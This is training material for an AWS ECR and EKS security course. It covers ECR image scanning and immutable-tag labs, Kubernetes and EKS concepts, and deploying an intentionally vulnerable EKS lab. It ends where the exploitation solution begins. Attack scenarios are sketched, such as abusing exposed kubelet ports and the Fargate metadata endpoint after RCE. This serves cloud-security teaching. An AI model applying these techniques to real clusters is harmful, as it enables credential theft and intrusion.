Note: Aqua Security's Docker Bench for Security is outdated and is a fork of Docker's Docker Bench for Security. Therefore, we are using the original repository.

Introduction to AWS Elastic Container Registry (ECR)

ecr

Image Credit: https://aws.amazon.com/ecr/

What is Amazon ECR?

  • Amazon Elastic Container Registry (ECR) is a fully managed container registry service by AWS.
  • It enables users to store, manage, share, and deploy container images and artifacts efficiently.
  • ECR eliminates the need to manage container registry infrastructure, reducing operational overhead.

Key Features of Amazon ECR

  • Fully managed by AWS, ensuring scalability and reliability.
  • Supports Docker and Open Container Initiative (OCI) images.
  • Simplifies the deployment of container images across AWS services and other platforms.
  • Provides both public and private repositories for flexibility.

Benefits of Amazon ECR

  • Integration with AWS services such as ECS, EKS, and Fargate.
  • Designed for high availability and durability of container images.
  • Ensures secure storage with encryption for data at rest and in transit.
  • Uses AWS IAM for fine-grained access control to repositories.
  • Provides image scanning to identify vulnerabilities in container images.
  • Allows cross-region and cross-account replication for distributed workloads.

Security Features of Amazon ECR

  • IAM policies and repository policies for access control.
  • Lifecycle policies to automate image retention and reduce costs.
  • Image scanning for vulnerabilities using CVEs databases like Clair or Amazon Inspector.
  • Immutable tags to prevent overwriting of critical container images.
  • Cross-region and cross-account replication to distribute workloads securely.

Public vs. Private Repositories

  • Private repositories store container images securely and require authentication for push/pull operations.
  • Public repositories share container images publicly and require authentication only for pushing images.

Monitoring and Logging

  • Integration with AWS CloudTrail to log API calls and events for auditing.
  • Event notifications via Amazon EventBridge to track image pushes, deletions, and scan results.

Common Use Cases

  • Store and deploy container images for microservices in ECS or EKS.
  • Share container images publicly using ECR Public.
  • Securely push images from CI/CD pipelines for reliable deployments.

Lab:AWS ECR Image Scanning for Vulnerabilities

Prerequisites

Configure AWS CLI

  • Configure AWS CLI with your credentials:
    aws configure
    
    • Provide AWS Access Key ID, Secret Access Key, Default region (e.g., us-west-2), and Default output format (e.g., json).

Hands on Lab

  • Change the directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Fetch your AWS Account ID:

    ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
    
  • Create a new repository in Amazon ECR.

    aws ecr create-repository --repository-name k8svillage-ecr-repo --region us-west-2 --image-scanning-configuration scanOnPush=true
    
  • Verify the repository creation:

    aws ecr describe-repositories --repository-name k8svillage-ecr-repo --region us-west-2
    
  • Log in to your ECR registry.

    aws ecr get-login-password --region us-west-2 | docker login --username AWS --password-stdin ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com
    
  • Create a sample Dockerfile, for building image.

    cat <<EOF > Dockerfile
    FROM ubuntu:latest
    ENV DEBIAN_FRONTEND=noninteractive
    RUN apt-get update && apt-get install -y curl && apt-get clean
    CMD ["bash"]
    EOF
    
  • Build the Docker image:

    docker build -t k8svillage-ecr-repo .
    
  • Tag the Docker image for ECR:

    docker tag k8svillage-ecr-repo:latest ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com/k8svillage-ecr-repo:latest
    
  • Push the Docker image to ECR:

    docker push ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com/k8svillage-ecr-repo:latest
    
  • Retrieve image details dynamically, to verify the results.

    IMAGE_DIGEST=$(aws ecr describe-images --repository-name k8svillage-ecr-repo --region us-west-2 --query 'imageDetails[0].imageDigest' --output text)
    
  • Retrieve scan findings.

    aws ecr describe-image-scan-findings --repository-name k8svillage-ecr-repo --image-id imageDigest=${IMAGE_DIGEST} --region us-west-2
    

In case on error in the scan, try in the another region.

Optional: View Scan Results in AWS Console

  • Navigate to the Amazon ECR service in the AWS Management Console.
  • Select your repository, then select the image.
  • Click on Vulnerabilities to view detailed scan results.

Clean Up Resources

  • Delete the ECR repository:

    aws ecr delete-repository --repository-name k8svillage-ecr-repo --region us-west-2 --force
    
  • Remove the Docker image locally:

    docker rmi ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com/k8svillage-ecr-repo:latest
    
  • Delete the Dockerfile:

    rm Dockerfile
    

Note: In case of error StartImageScan seems to be disabled when Enhanced scanning is enabled, visit repost.aws

Lab: AWS ECR Immutable Image Tag

Prerequisites

Configure AWS CLI

  • Configure AWS CLI with your credentials:
    aws configure
    
    • Provide AWS Access Key ID, Secret Access Key, Default region (e.g., us-east-1), and Default output format (e.g., json).

Hands-on Lab

  • Change the directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Fetch your AWS Account ID:

    ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
    
  • Create an ECR repository with an immutable image tag policy:

    aws ecr create-repository --repository-name immutable-repo     --region us-east-1 --image-tag-mutability IMMUTABLE
    
  • Verify the repository creation:

    aws ecr describe-repositories --repository-name immutable-repo --region us-east-1
    
  • Log in to your ECR registry:

    aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com
    
  • Create a sample Dockerfile:

    cat <<EOF > Dockerfile
    FROM alpine:latest
    RUN apk add --no-cache curl
    CMD ["sh"]
    EOF
    
  • Build the Docker image:

    docker build -t immutable-repo .
    
  • Tag the Docker image for ECR:

    docker tag immutable-repo:latest ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Push the Docker image to ECR:

    docker push ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Try pushing another image with the same tag to test the immutability:

    docker push ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Now check for immutability.

  • Change the CMD or add/remove a line to create a new layer:

    sed -i 's/sh/bash/' Dockerfile
    
  • Rebuild the image with changes.

    cat Dockerfile
    
    docker build --no-cache -t immutable-repo .
    
  • Tag and attempt to push the modified image.

    docker tag immutable-repo:latest ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
    docker push ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    

There should be an error indicating that the tag is immutable.

The push should fail with an error. tag invalid: The image tag '1.0.0' already exists in the 'immutable-repo' repository and cannot be overwritten because the repository is immutable.


Optional: View Repository in AWS Console

  • Navigate to the Amazon ECR service in the AWS Management Console.
  • Select your repository (immutable-repo).
  • Verify the images and the immutable tag policy.

Clean Up Resources

  • Delete the ECR repository and all its contents:

    aws ecr delete-repository --repository-name immutable-repo --region us-east-1 --force
    
  • Remove the Docker image locally:

    docker rmi ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Delete the Dockerfile:

    rm Dockerfile
    

Introduction to EKS & Key AWS EKS Components

Amazon Elastic Kubernetes Service (EKS) is a managed service that simplifies Kubernetes deployments. Below, we will explore the key components of EKS and how to manage access securely.

What is AWS EKS?

  • Amazon Elastic Kubernetes Service (EKS) is a fully managed service that simplifies Kubernetes deployment, management, and scaling on AWS. It enables developers to run Kubernetes clusters without worrying about the complexity of managing the underlying infrastructure.

  • EKS automates much of the administrative tasks, such as monitoring, scaling, and patching the control plane, so you can focus on deploying and scaling your applications.

  • Key Benefits of EKS:

    • Fully Managed: AWS handles all the heavy lifting of managing the Kubernetes control plane.
    • High Availability: EKS is designed to be highly available, running across multiple Availability Zones (AZs).
    • Scalability: EKS can scale up and down based on the needs of your application.

Now, let’s dive into the core components that make EKS work.

Components of AWS EKS?

  • EKS Control Plane

    • The Control Plane is the heart of the EKS service and is fully managed by AWS. It consists of multiple services distributed across three AWS Availability Zones, which ensures redundancy and high availability.

    • Responsibilities of the Control Plane:

    • Kubernetes API Server: This is the entry point for interacting with your cluster. All commands and communications from your applications go through the API server.

    • ETCD: A key-value store where Kubernetes stores all cluster data. This is critical for keeping the cluster in sync across nodes.

    • Controller Manager: Ensures that the state of your application matches the desired state. For example, if a pod goes down, the controller ensures it’s restarted.

    • Scheduler: Decides which node will run a specific pod, optimizing resource usage.

The control plane also manages the networking between your pods and handles load balancing between nodes​(Amazon Web Services, Inc.

  • EKS Data Plane

    • The Data Plane is where your workloads (applications and services) run. This consists of Amazon EC2 instances that serve as worker nodes. You can choose the instance type that fits your workload, and EKS manages communication between the control plane and these worker nodes.
    • Flexible Scaling: The data plane scales with demand, allowing you to increase or decrease the number of EC2 instances based on the current workload.
    • Integration with AWS Services: EKS integrates with AWS services like Elastic Load Balancer (ELB) and Auto Scaling Groups, which automatically manage traffic and adjust node size.
    • Worker Nodes (The data plane in EKS is essentially made up of the worker nodes):
      • Each worker node is an EC2 instance that runs the Kubernetes components needed to manage your workloads, such as the kubelet, which communicates with the API server.
      • These nodes are responsible for running your application pods.
  • Fargate for EKS (Serverless Option)

    • Fargate is AWS’s serverless compute option for EKS, which eliminates the need to manage EC2 instances for running Kubernetes pods. With Fargate, you specify the resources your pods need (CPU, memory), and AWS automatically provisions and manages the infrastructure.

    • Advantages of Fargate:

    • No Node Management: You don't need to worry about managing or scaling EC2 instances.

    • Cost-Efficient: You only pay for the resources your application uses.

    • Serverless Architecture: Fargate automatically scales based on your application’s requirements.

  • EKS Networking and Load Balancing

    • Networking is crucial in EKS, as it controls how pods communicate with each other and external services.

    • Key Components:

      • Kubernetes Networking: Each pod in EKS gets its own IP address, which allows for direct communication between pods without network address translation (NAT).
      • Elastic Load Balancer (ELB): EKS integrates with AWS’s Elastic Load Balancer to distribute incoming traffic across your worker nodes. This ensures high availability and smooth user experience even during traffic spikes.
  • Load Balancer Example:

    • You can set up an ALB (Application Load Balancer) to route traffic between your pods based on a specific rule, such as URL path.
  • EKS Security and IAM

    • Security in EKS is achieved through a combination of AWS Identity and Access Management (IAM) and Kubernetes Role-Based Access Control (RBAC). This ensures fine-grained control over who can access your Kubernetes resources.

    • Key Security Features:

      • IAM for Pods (IRSA): IAM Roles for Service Accounts (IRSA) enable you to assign IAM roles to Kubernetes pods, allowing them to securely access AWS services.

      • RBAC: Kubernetes RBAC restricts which users and pods can perform certain actions on resources within the cluster.

      • Example: IAM Role for Pods (IRSA)

        • Create an IAM role with the required permissions (e.g., access to an S3 bucket).
        • Associate the IAM role with a Kubernetes service account.
        • The pod will automatically assume this role and gain access to the required AWS service.
  • EKS Storage Options

    • EKS offers multiple storage options, depending on the type of data you need to store:

      • Ephemeral Storage: Temporary data tied to the pod’s lifecycle.
      • Amazon EBS (Elastic Block Store): Persistent storage volumes for stateful applications, such as databases.
      • Amazon EFS (Elastic File System): Scalable file storage for applications needing shared access to files.

These storage solutions integrate seamlessly with EKS and provide flexibility based on your needs.

  • Monitoring and Observability

    • EKS integrates with AWS services like CloudWatch and GuardDuty to provide monitoring, logging, and security threat detection for your cluster.

    • Monitoring Tools:

      • Amazon CloudWatch: Monitor metrics such as CPU usage, memory, and network traffic.
      • Amazon GuardDuty: Detect suspicious activity, like unauthorized access to your cluster or node misconfigurations​Amazon AWS Docs.

Lab: Deploying a Vulnerable AWS EKS Infrastructure

In this lab, deploy a vulnerable AWS EKS infrastructure. The following steps will guide through setting up the infrastructure using bash script.

Step-by-Step Guide

  • Navigate to the EKS Directory:
cd /workspaces/ecr_eks_security_masterclass_public/eks/

Ensure you have administrative privileges by configuring the AWS CLI using aws configure with your access and secret keys.

  • Input the following information:

    • AWS Access Key ID
    • AWS Secret Access Key
    • Default region name (set to us-west-2 or us-east-1 based on your region)
    • Default output format (choose json)
  • Validate AWS Administrative Privileges:

    • Use the AWS STS (Security Token Service) to verify your identity and ensure you have the necessary permissions.
    aws sts get-caller-identity
    

    alt text

Ensure that AWS CLI is properly configured and have administrative privileges to deploy EKS clusters.

  • Run the Deployment Script:

    • Deploy the vulnerable EKS infrastructure by running the deploy.sh script. You can specify a region using the --region flag. If no region is specified, it will default to us-west-2.
    bash deploy.sh --region us-west-2
    

    alt text

    Select a different region, replace us-west-2 with the desired region like us-east-1. Currently us-east-1 & us-west-2 are supported.

  • Confirmation Prompt:

    • Receive a confirmation prompt:
    Do you want to continue with the deployment? (Y/N)
    
    • Type Y to proceed with the deployment.

    alt text

  • Deployment Process:

    • The deployment process may take up to 15 minutes as it provisions the EKS cluster and associated resources.

    alt text

  • Final Output:

    • After the deployment is complete, review the summary of the deployment, along with command for accessing the deployed EKS cluster.

    alt text

  • Access the Vulnerable Application:

    • After the deployment, you can access the vulnerable application via the public IP of the EC2 instance:
      echo "Access the application at: http://$(jq -r '.instance_public_ip.value' < ec2_output.json)"
      
  • Configure the EKS Cluster.

    echo "Authenticate to EKS cluster via: aws eks update-kubeconfig --region $(grep 'ECR Repository URL' deployment_output.txt | awk -F'.' '{print $4}') --name $(grep 'EKS Cluster Name' deployment_output.txt | awk '{print $4}')"
    
    

    alt text

Refer to this video for detailed walkthrough

Kubernetes Architecture

This section explains the architecture and key components of Kubernetes, focusing on how the control plane and worker nodes operate together.

  • Control Plane Components:

    • kube-apiserver
    • etcd
    • kube-scheduler
    • kube-controller-manager
    • cloud-controller-manager
  • Worker Node Components:

    • kubelet
    • kube-proxy
    • Container Runtime

Note: The diagram below represents the architecture of Kubernetes clusters and components.

alt text

Control Plane

  • kube-apiserver:

    • The API server is the entry point for all administrative tasks in a Kubernetes cluster. It handles RESTful API requests from users and cluster components.
    • It performs authentication, authorization, and resource management by interfacing with etcd.
  • etcd:

    • A highly available and distributed key-value store that stores all cluster data, including the configuration, state, and metadata of Kubernetes objects like pods, services, etc.
    • It ensures that any update made to the cluster is stored and accessible across all control plane components.
  • kube-scheduler:

    • The scheduler is responsible for assigning new pods to available nodes. It considers various constraints, like resource requirements and policies, to ensure pods are efficiently placed.
  • kube-controller-manager:

    • This component runs the core control loops that watch for changes in cluster state. If the desired state does not match the actual state, it takes corrective action.
    • It manages built-in controllers like Deployment, ReplicaSet, and Job.
  • cloud-controller-manager:

    • This controller manages integration with cloud provider APIs (e.g., AWS, GCP). It ensures that resources like load balancers and storage are provisioned based on cloud-specific requirements.

Worker Nodes

  • kubelet:

    • The kubelet is the agent that runs on each worker node. It ensures containers are running in pods and reports the node and pod status to the control plane.
    • It interacts with the container runtime to manage containers.
  • kube-proxy:

    • Kube-proxy runs on every worker node to manage network rules and ensure proper routing of traffic to pods.
    • It supports communication between different services within the cluster and external traffic.
  • Container Runtime:

    • The container runtime, such as containerd or Docker, is responsible for pulling container images and managing the container lifecycle within pods.

Architecture Flow

  • User Request: When a user interacts with Kubernetes (e.g., deploying an application), they send a request to the kube-apiserver using kubectl.
  • API Server Interaction: The API server processes the request and records changes in etcd. If a new pod needs to be created, the API server passes this information to the scheduler.
  • Scheduler Action: The scheduler selects a suitable worker node and assigns the pod to it.
  • Node Operations: The kubelet on the selected worker node pulls the container image using the container runtime, starts the pod, and continuously monitors its health.
  • Networking: Kube-proxy manages the network rules to ensure the pod is accessible based on the assigned service.

References

Important AWS EKS Terminologies

Understanding key terminologies in Amazon EKS is essential for working with the platform effectively. Below, we explain each term, including edge cases and potential issues you might encounter in real-world scenarios.

  • 1. Cluster

    An EKS Cluster is the core of your EKS environment, containing all the resources needed to run your Kubernetes workloads.

    • Edge Case: Cluster Not Accessible:
      • If the control plane is down or misconfigured, the cluster might become inaccessible. You won’t be able to interact with Kubernetes resources using the kubectl command, and the Kubernetes API may not respond.
    • Explanation:
      • Always configure proper network access (public or private endpoints) to your cluster.
      • Ensure that IAM roles are properly set up for kubectl access.
  • Possible Attack Scenario: Misconfigured network access to the control plane or IAM roles.

  • 2. Node

    A Node is a worker machine, typically an EC2 instance, that runs your application pods.

    • Edge Case: Node Not Joining the Cluster:

      • Sometimes, a node might fail to join the cluster, leading to resource shortages. This can happen due to misconfigured security groups, missing IAM roles, or incorrect bootstrap scripts.
    • Explanation:

      • Ensure correct IAM roles and security groups for worker nodes.
      • Always validate the bootstrap process for each node.
    • Possible Attack Scenario: If IAM roles are not attached properly or security groups block communication between nodes and the control plane, nodes won't join.

  • 3. Pod

    A Pod is the smallest deployable unit in Kubernetes and can contain one or more containers.

    • Edge Case: Pod Not Scheduling:

      • A pod may not schedule on a node due to insufficient resources (CPU or memory), taints, or affinity rules.
    • Explanation:

    • Always monitor resource utilization and ensure enough capacity for new pods.

    • Check taints and tolerations that might block certain pods from being scheduled on nodes.

    • Possible Attack Scenario: Resource limits on nodes or misconfigured scheduling by attacker can prevent pods from running.

  • 4. Control Plane

    The Control Plane in EKS is managed by AWS and includes critical components like the API server, scheduler, and etcd.

    • Edge Case: Control Plane Not Accessible:

      • You might face scenarios where the control plane is not accessible due to network configuration issues or IAM role misconfigurations. This can make your cluster unreachable.
    • Explanation:

      • Always ensure that the control plane endpoint (public or private) is configured correctly.
      • Verify IAM roles and policies to allow access to the Kubernetes API server.
    • Possible Attack Scenario: Attacker controlled misconfigured VPC or endpoint access settings, or modified IAM policies that deny access to the control plane.

  • 5. Kubelet

    The kubelet is an agent that runs on each node, ensuring the containers are running as expected.

    • Edge Case: Kubelet Not Communicating with the API Server:

      • If the kubelet fails to communicate with the API server, the node might become NotReady, meaning it won’t accept new pods.
    • Explanation:

      • Check network connectivity between the node and the control plane.
      • Ensure the kubelet service is running and has sufficient permissions.
    • Possible Attack Scenario: Kubelet runs on 10255, if node is public & open to 0.0.0.0/0, there are chances that kubelet is accessible at 10250 port or 10255 port. Apart from this is permission of Nodes/Proxy is present then attacker can control the kubelet & access any pod.

  • 6. Kubernetes API Server

    The API Server is the central communication hub of the Kubernetes cluster.

    • Edge Case: API Server Rate Limits:

      • If there are too many requests, the API server might hit rate limits, leading to 503 errors or delayed responses.
    • Explanation:

      • Use rate limiting and caching for monitoring tools to avoid overloading the API server.
      • Monitor API server logs for signs of rate limiting.
    • Possible Attack Scenario: Publicly exposed API server can be used by attacker, in case cluster config is leaked or user is compromised.

  • 7. IAM (Identity and Access Management)

    IAM is used to manage who can access your cluster and what actions they can perform.

    • Edge Case: IAM Role Misconfiguration:

      • If an IAM role is missing required permissions, users might not be able to access the EKS cluster or resources within it, leading to access denied errors.
    • Explanation:

      • Always ensure that IAM roles are properly configured with the correct policies.
      • Regularly audit your IAM roles to prevent over-permissive access.
    • Possible Attack Scenario: Incorrectly configured IAM policies can lead to privilege escalations. This is from AWS perspective.

  • 8. RBAC (Role-Based Access Control)

    RBAC controls access to Kubernetes resources based on the roles assigned to users and applications.

    • Edge Case: Over-Permissioned Roles:

      • A common misconfiguration is assigning overly broad permissions through ClusterRoleBindings, leading to privilege escalation risks.
    • Explanation:

      • Implement the principle of least privilege when configuring RBAC.
      • Regularly review RBAC configurations to ensure that roles are not over-permissioned.
    • Possible Attack Scenario: Misconfigured RBAC that grants excessive access to service accounts or users. This is from cluster perspective

  • 9. Fargate

    Fargate allows you to run containers in EKS without managing the underlying infrastructure.

    • Edge Case: Fargate Pod Limits:

      • Fargate has certain limitations, such as pod memory and CPU limits. If a pod exceeds these limits, it may not schedule or could be evicted.
    • Explanation:

      • Ensure your pod's resource requests and limits are within Fargate's allowed range.
      • Monitor resource usage to avoid evictions.
    • Possible Attack Scenario: Misconfigured resource requests that exceed the Fargate limits as it is serverless. Attacker with RCE can exploit ECS Fargate by exploiting http://169.254.170.2/v2/metadata/ endpoint. Stackoverflow

Credits:

  • https://aws.amazon.com/eks/
  • https://securitylabs.datadoghq.com/articles/amazon-eks-attacking-securing-cloud-identities/

AWS EKS Authentication & Authorisation

Introduction to Authentication and Authorization in EKS

  • Authentication: Verifies who the user is. In AWS EKS, this is managed through AWS Identity and Access Management (IAM) or OpenID Connect (OIDC) providers.
  • Authorization: Determines what actions the authenticated user can perform within the EKS cluster. This is managed through Kubernetes Role-Based Access Control (RBAC).

AWS EKS Authentication

  • Types of Identities in EKS:

    • AWS IAM Principals: Users or roles that are managed through AWS IAM.
    • OIDC Users: Users authenticated through an OIDC provider (not covered in this guide).
  • EKS uses IAM to authenticate users who need access to manage clusters or perform operations on Kubernetes objects like pods, deployments, etc.

Deep Dive in Authz & Authn of EKS

  • After creating an EKS cluster, the next step is configuring kubectl for cluster access. This section explains the kubeconfig setup and how EKS verifies who is making requests to the Kubernetes API.

  • Authentication Example:

    • The AWS CLI generates a kubeconfig file with the necessary details for connecting to the API server.
    • A specific token is generated using aws eks get-token, which allows authentication with the EKS API server.
    • This token is used in HTTP requests (such as with curl) to authenticate and interact with the Kubernetes API.
  • Sample EKS Config.

Location: ~/.kube/config

apiVersion: v1
kind: Config
preferences: {}
current-context: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURaRENDQXlDZ0F3SUJBZ0lJYmpKUERuejVVekFKQmdncWhrak9QUVFEQWpCek1TTUdRek0wTURFdwpPREU1TVRVd1dUUXpNalV3TmpReU5UWmpOek1HTm1Rd1l6QTJNVEV5TXprd1pEY3pNVGczTVRBd1dnWURWUVFHCkJCVEpUb2dwNEFNRUlCQ3NHQVRBY0dnMk1UUmdZR0ZNUmlDNFk5ZGdXYmVYTU1CQmZCZ3NxaGtpRzl3MEJBUTAKQUZNUVFmOXBMbjA1WklSTVBpWFRsRnlDZ29vN3Rjb1F3Q2dZSUtvWkl6ajBFQXdJRFNBQXdSUUlnTUJFRwpRQ3NnS21JRXNEd29wQ1FLS0RFTEJFSXpPUFFrRXhOZ3JqaFZFM3hRb3RMMVRzVW13ZXo5ekJxbWpNRDZKSzdlCmxiT2t1aDBwMGVucm1CUUlGTzN1dTUzM1FZRlZpQm8vM1VaN2dBZ2REWnV2blVTMUtEdnRtS2dVdTNzdmZkcWkKRFR0ckJXRHJvMldRTkVpMEVwdWpXVXg3ek10V1hPN0ZtM1cxSmFRU2VCaDhzYmtuY1AxTkFYUmVnbm1FdlMrZwoxU1ljNlJlVmVPa0JHUm5CQ2pPdVhaYnlHNDZMeUJRTDBDT0dpODZCUnNnb0tJVkRFWGNNTzZXbmhhNGdOcmF6Cm1WZ21TZkZQdEl0SkFBL2h4a2xNb0x5NDRqTXAxK1FFVzdOdW8vRFdBd2dmam9UVk9nR2dxSDZ2RnhCdStFR3gKMWNmN01tb2FkMUNxVVhNSjgvNlAzN3R2RHd4ckJZWEZMR0Ewbk9XTnJmY3NFMmx2M2NFbmdDTE1QOWV1V1RuRQpHRmZnVGp3NU5Mdz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
    server: https://123456789012.gr7.us-west-2.eks.amazonaws.com
  name: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
contexts:
- context:
    cluster: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
    user: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
  name: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
users:
- name: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: aws
      args:
      - eks
      - get-token
      - --region
      - us-west-2
      - --cluster-name
      - my-eks-cluster
  • Authorization: aws-auth ConfigMap (Deprecated)

    • Previously, the aws-auth ConfigMap in EKS was used to map IAM roles to Kubernetes roles. However, this method is deprecated and has several limitations, including "shadow administrators" who have invisible privileges.

Challenges of aws-auth ConfigMap (Deprecated):

  • It's hard to know who has admin privileges.

  • Break-the-glass roles might lack access during incidents.

  • Cloud security tools may not track Kubernetes API access effectively.

    • Example: Mapping IAM roles in aws-auth, but realizing hidden admin privileges can't be managed easily.

Under the Hood: aws-iam-authenticator

  • The aws-iam-authenticator component handles request authentication in EKS. It works by forwarding authentication tokens to the API server, which then verifies the user’s AWS identity via pre-signed AWS API requests.

  • Token Structure Example:

    • The token generated for EKS authentication is a pre-signed request for sts:GetCallerIdentity.
    • Decoding the token reveals that it allows AWS to verify the caller’s identity using this URL.
  • Example: Using aws eks get-token to generate a pre-signed token, which is then decoded to show the authentication request to AWS.

Authorization: EKS Cluster Access Management (Recommended)

In November 2023, AWS introduced a better way to manage access to EKS clusters through AWS APIs, eliminating the drawbacks of the aws-auth ConfigMap.

  • Recommended Practice:
    • Migrating from aws-auth to the new access management feature is advised for improved security and control.

Steps by step guide to understand EKS authentication

  • Step 1: Create or Use an Existing IAM User or Role

    • The first step in setting up authentication is to create an IAM user or use an existing IAM role. Focus on enabling "Programmatic Access" if you only need CLI/API interaction.
  • Step 2: Attach Required Permissions to IAM User

    • Attach a policy that gives the user permission to access the cluster. For example, the eks:DescribeCluster permission allows the user to see details about EKS clusters.
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DescribeAllEksClusters",
      "Effect": "Allow",
      "Action": "eks:DescribeCluster",
      "Resource": "*"
    }
  ]
}
  • Step 3: Configure AWS CLI
aws configure
  • Step 4: Update kubeconfig
aws eks update-kubeconfig --name <cluster-name>

AWS EKS Authorization

  • Step 1: Understand the aws-auth ConfigMap (deprecated)
kubectl get configmaps aws-auth -n kube-system -o yaml > auth.yaml
  • Step 2: Add IAM User to aws-auth ConfigMap
data:
  mapUsers: |
    - userarn: arn:aws:iam::ACCOUNTID:user/eks_user
      username: eks_user
  • Step 3: Define Kubernetes RBAC Roles
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-manager
  namespace: default
rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["create", "delete", "get", "list", "patch", "update"]
  • Step 4: Bind the Role to a User (RoleBinding)
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: pod-manager-binding
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: pod-manager
subjects:
  - kind: User
    name: eks_user
    apiGroup: rbac.authorization.k8s.io
  • Step 5: Test the Permissions
kubectl auth can-i create pods --namespace default

Conclusion

  • Authentication happens before Authorization.
  • RBAC roles and bindings in Kubernetes control what a user can do within a specific namespace or the entire cluster.

EKS CLuster Access Management

  • In EKS, managing who has access to your cluster is crucial for security. Here’s how you can securely manage access: ConfigMap-based Authentication

  • Earlier, the aws-auth ConfigMap was used to control access to EKS clusters. However, this approach had limitations:

    • The creator of the cluster had invisible administrative access.
    • Admin roles were not visible through the AWS API.

New EKS Cluster Access Management

  • Starting November 2023, AWS introduced EKS Cluster Access Management:

    • Now grant access through AWS APIs instead of relying solely on aws-auth.
    • This method provides better visibility and control over who can access the cluster.

To switch to the new access management system, it’s recommended to migrate from aws-auth ConfigMap to EKS API-based access management.

Key Concepts of EKS Cluster Access Management

  • Two important concepts in this new method are:

    • Access Entries: This is where you define which AWS user or role can access the EKS cluster.
    • Access Policies: These are predefined sets of permissions that specify what actions the user or role can perform in the cluster.
  • Authentication Modes

    • In EKS, the cluster’s access management can work in three different modes:

      • CONFIG_MAP: Uses only the aws-auth ConfigMap to manage access.
      • API: Uses only access entries created via the AWS API.
      • API_AND_CONFIG_MAP: Uses both methods, but gives preference to access entries from the API.

The default mode for most clusters is API_AND_CONFIG_MAP, which is recommended for better control.

  • Step-by-Step: Managing Cluster Access with Access Entries
    • Step 1: Create a Cluster Admin User

      • First, create an IAM user that will act as the cluster admin. Use the following command to generate access keys, refer to example..

        aws iam create-access-key --user-name cluster-admin
        
    • Step 2: Create an Access Entry

      • Now, create an access entry for this IAM user in the cluster, refer to example.

        aws eks create-access-entry --cluster-name demo-cluster \
          --principal-arn arn:aws:iam::123456789012:user/cluster-admin
        
    • Step 3: Associate an Access Policy

      • To grant admin-level access, associate the AmazonEKSClusterAdminPolicy with the access entry, refer to example.

        aws eks associate-access-policy --cluster-name demo-cluster \
          --principal-arn arn:aws:iam::123456789012:user/cluster-admin \
          --policy-arn arn:aws:eks::aws:policy/AmazonEKSClusterAdminPolicy \
          --access-scope type=cluster
        

Conclusion:

  • The aws-auth ConfigMap is deprecated but still functional for older clusters.
    • aws-auth ConfigMap is legacy way.
    • API-based access management is the new way Create a dedicated section for new API-based access management with detailed examples.
  • aws-iam-authenticator is embedded and doesn't require manual setup in EKS-managed clusters.

Credits:

⭐⭐⭐⭐⭐

Lab: Exploiting Sample Application

Exploiting real world application with CVE affecting AWS infra and thus exploiting EKS.

  • Change the current directory to the deployment directory eks.

    cd /workspaces/ecr_eks_security_masterclass_public/eks/
    
  • Configure the EKS Cluster.

    • Copy paste the command generated after this on the terminal to set AWS EKS Context
    echo "Authenticate to EKS cluster via: aws eks update-kubeconfig --region $(grep 'ECR Repository URL' deployment_output.txt | awk -F'.' '{print $4}') --name $(grep 'EKS Cluster Name' deployment_output.txt | awk '{print $4}')"
    
    

    The command aws eks update-kubeconfig updates your local Kubernetes configuration (kubeconfig) file to include the AWS EKS cluster details.

    The "Updated context," means that your local kubectl command will now be able to interact with the specified EKS cluster (peachycloudsecurity-{xxxxx}) using the correct credentials and settings for that cluster in the given region (us-west-2).

    alt text

  • Access the Vulnerable Application:

    • After the deployment, you can access the vulnerable application via the public IP of the EC2 instance:

      echo "Access the application at: http://$(jq -r '.instance_public_ip.value' < ec2_output.json)"
      

      alt text

  • Copy paste the URL in the browser to start pentesting the web application to gain access to AWS Infra.

⚠️ DISCLAIMER: The next section of this lab contains the solution. If interested in challenges, STOP HERE and do not proceed to the next step. Try to exploit the application before checking the solution.

alt text

Credits for image: Offensive Security Say – Try Harder!

Excited About the Class:

Enumerate & Exploit Web Application

⚠️ DISCLAIMER: This section of the lab contains the solution. If interested in challenges, STOP HERE and do not proceed. Try to exploit the application before checking the solution.


⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.

IPs in the snapshot might change as different labs will have different public IP.


Enumeration

  • As the application did not open in the browser. Next step is to enumerate before giving up.

alt text

Let's try harder

alt text

  • Change the directory.
cd /workspaces/ecr_eks_security_masterclass_public/eks
  • Setup the vulnerable IP as variable, so that it can be referenced.
